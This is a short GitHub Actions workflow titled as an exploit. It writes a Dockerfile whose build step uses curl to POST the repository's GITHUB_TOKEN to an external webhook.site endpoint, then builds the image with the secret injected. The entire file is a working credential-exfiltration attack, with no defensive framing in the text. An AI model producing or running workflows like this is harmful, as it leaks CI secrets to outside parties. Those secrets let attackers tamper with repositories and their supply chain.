name: Exploit RCE and Exfiltrate GITHUB_TOKEN

on:
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest
    env:
      GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

    steps:
      - name: Checkout
        uses: actions/checkout@v3

      - name: Build with Injected GITHUB_TOKEN
        run: |
          echo "ARG GITHUB_TOKEN" > Dockerfile
          echo 'RUN curl -X POST https://webhook.site/529200f3-872d-4083-bf2d-b5c014761b69 -d "TOKEN=$GITHUB_TOKEN"' >> Dockerfile
          docker build --build-arg GITHUB_TOKEN=${{ secrets.GITHUB_TOKEN }} -t hacked-image .
